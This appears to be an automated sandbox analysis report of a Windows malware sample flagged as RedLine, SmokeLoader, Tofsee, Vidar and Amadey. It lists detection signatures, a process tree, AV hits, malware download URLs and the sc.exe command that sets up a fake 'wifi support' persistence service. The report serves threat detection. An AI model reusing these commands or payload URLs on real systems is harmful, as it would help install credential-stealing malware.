Loading ...

Play interactive tourEdit tour

Windows Analysis Report eIxMVDoQF3.exe

Overview

General Information

Sample Name:eIxMVDoQF3.exe
Analysis ID:553015
MD5:b45bf93a4b27690392433619c5006e8b
SHA1:9ec3ad4b028ab127e71fd755263dd0aa8a17260e
SHA256:e997341ab2422f5471f4c9f1df84f7a52e16fa38d64e6e0f4f94859cc234e2f8
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Amadey RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Social media urls found in memory data
Found evaded block containing many API calls
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • eIxMVDoQF3.exe (PID: 6904 cmdline: "C:\Users\user\Desktop\eIxMVDoQF3.exe" MD5: B45BF93A4B27690392433619C5006E8B)
    • eIxMVDoQF3.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\eIxMVDoQF3.exe" MD5: B45BF93A4B27690392433619C5006E8B)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • F805.exe (PID: 6800 cmdline: C:\Users\user\AppData\Local\Temp\F805.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 5620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • B50.exe (PID: 5760 cmdline: C:\Users\user\AppData\Local\Temp\B50.exe MD5: FF0D190D6DF636D7DE53B8B6B683BC6E)
        • 743F.exe (PID: 6640 cmdline: C:\Users\user\AppData\Local\Temp\743F.exe MD5: F05279062D67B1F816420725086C77AB)
          • cmd.exe (PID: 6360 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\icpymrdv\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3532 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5508 cmdline: C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\sc.exe" description icpymrdv "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 7D0A.exe (PID: 6788 cmdline: C:\Users\user\AppData\Local\Temp\7D0A.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 7D0A.exe (PID: 2008 cmdline: C:\Users\user\AppData\Local\Temp\7D0A.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
  • svchost.exe (PID: 6964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7020 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7056 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7120 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7160 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3928 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6264 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6216 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5504 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • rwjfsvd (PID: 6856 cmdline: C:\Users\user\AppData\Roaming\rwjfsvd MD5: B45BF93A4B27690392433619C5006E8B)
    • rwjfsvd (PID: 6844 cmdline: C:\Users\user\AppData\Roaming\rwjfsvd MD5: B45BF93A4B27690392433619C5006E8B)
  • svchost.exe (PID: 5580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2056 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4844 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000025.00000000.429672404.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000018.00000002.432619186.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          00000025.00000000.428360740.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000025.00000000.429057949.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0000000F.00000002.382566740.0000000000460000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 13 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                15.2.rwjfsvd.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  24.2.743F.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                    24.2.743F.exe.570e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      25.2.7D0A.exe.447f910.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        1.1.eIxMVDoQF3.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          Click to see the 16 entries

                          Sigma Overview

                          System Summary:

                          barindex
                          Sigma detected: Copying Sensitive Files with Credential DataShow sources
                          Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\743F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\743F.exe, ParentProcessId: 6640, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\, ProcessId: 3532
                          Sigma detected: New Service CreationShow sources
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\743F.exe, ParentImage: C:\Users\user\AppData\Local\Temp\743F.exe, ParentProcessId: 6640, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create icpymrdv binPath= "C:\Windows\SysWOW64\icpymrdv\tvdcssmj.exe /d\"C:\Users\user\AppData\Local\Temp\743F.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5508

                          Jbx Signature Overview

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection:

                          barindex
                          Antivirus detection for URL or domainShow sources
                          Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                          Source: http://data-host-coin-8.com/files/9042_1641895079_9876.exeAvira URL Cloud: Label: malware
                          Antivirus detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                          Multi AV Scanner detection for submitted fileShow sources
                          Source: eIxMVDoQF3.exeVirustotal: Detection: 38%Perma Link
                          Multi AV Scanner detection for domain / URLShow sources
                          Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeVirustotal: Detection: 16%Perma Link
                          Source: http://data-host-coin-8.com/files/9042_1641895079_9876.exeVirustotal: Detection: 12%Perma Link
                          Multi AV Scanner detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\1FD7.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\1FD7.exeReversingLabs: Detection: 63%
                          Source: C:\Users\user\AppData\Local\Temp\3A08.exeReversingLabs: Detection: 85%
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeMetadefender: Detection: 45%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeReversingLabs: Detection: 89%
                          Source: C:\Users\user\AppData\Local\Temp\E5C8.exeMetadefender: Detection: 34%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\E5C8.exeReversingLabs: Detection: 63%
                          Source: C:\Users\user\AppData\Local\Temp\F6C0.exeMetadefender: Detection: 29%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\F6C0.exeReversingLabs: Detection: 81%
                          Machine Learning detection for sampleShow sources
                          Source: eIxMVDoQF3.exeJoe Sandbox ML: detected
                          Machine Learning detection for dropped fileShow sources
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\tvdcssmj.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\E5C8.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\3A08.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1547.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\27D7.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\6CF.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\F6C0.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1FD7.exeJoe Sandbox ML: detected
                          Source: 23.3.B50.exe.590000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 23.2.B50.exe.570e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.3.743F.exe.590000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.743F.exe.570e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                          Source: 24.2.743F.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00407190 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005776C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00574A80 CryptStringToBinaryA,CryptStringToBinaryA,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00577760 CryptUnprotectData,LocalAlloc,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005779F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005773E0 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_0691BE60 CryptUnprotectData,
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_0691C868 CryptUnprotectData,

                          Compliance:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeUnpacked PE file: 23.2.B50.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeUnpacked PE file: 24.2.743F.exe.400000.0.unpack
                          Source: eIxMVDoQF3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49804 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49858 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49884 version: TLS 1.2
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: F805.exe, 00000010.00000002.415183995.0000000000413000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.371111845.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000016.00000002.414101701.00000000053D0000.00000002.00020000.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.385582652.0000000004FC9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: dC:\fuyazosav96\tohoxubuy-parovu\hutecu\gif-rewasugirupo.pdbh source: B50.exe, 00000017.00000000.384081537.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: FC:\nezo37 pagap_pejusexi bopabizaseg\wumogu30\gonoxiwi.pdbh source: 743F.exe, 00000018.00000000.389463395.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdby source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\nezo37 pagap_pejusexi bopabizaseg\wumogu30\gonoxiwi.pdb source: 743F.exe, 00000018.00000000.389463395.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\vapep44\dasijubud\xerateyot\fobo.pdb source: eIxMVDoQF3.exe, eIxMVDoQF3.exe, 00000000.00000000.272266280.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000000.00000002.276994985.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000001.00000000.275168488.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000002.368688662.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000000.362684220.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000F.00000000.365468817.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000016.00000003.391169468.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: shell32.pdb= source: WerFault.exe, 00000016.00000003.391179867.0000000005467000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.391160318.00000000052E1000.00000004.00000001.sdmp
                          Source: Binary string: C:\fuyazosav96\tohoxubuy-parovu\hutecu\gif-rewasugirupo.pdb source: B50.exe, 00000017.00000000.384081537.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: F805.exe, 00000010.00000002.415183995.0000000000413000.00000002.00020000.sdmp, F805.exe, 00000010.00000000.371111845.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000016.00000002.414101701.00000000053D0000.00000002.00020000.sdmp
                          Source: Binary string: VC:\vapep44\dasijubud\xerateyot\fobo.pdbh source: eIxMVDoQF3.exe, 00000000.00000000.272266280.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000000.00000002.276994985.0000000000401000.00000020.00020000.sdmp, eIxMVDoQF3.exe, 00000001.00000000.275168488.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000002.368688662.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000E.00000000.362684220.0000000000401000.00000020.00020000.sdmp, rwjfsvd, 0000000F.00000000.365468817.0000000000401000.00000020.00020000.sdmp
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00419AC9 BuildCommDCBAndTimeoutsW,CreateMailslotA,GetNamedPipeHandleStateA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
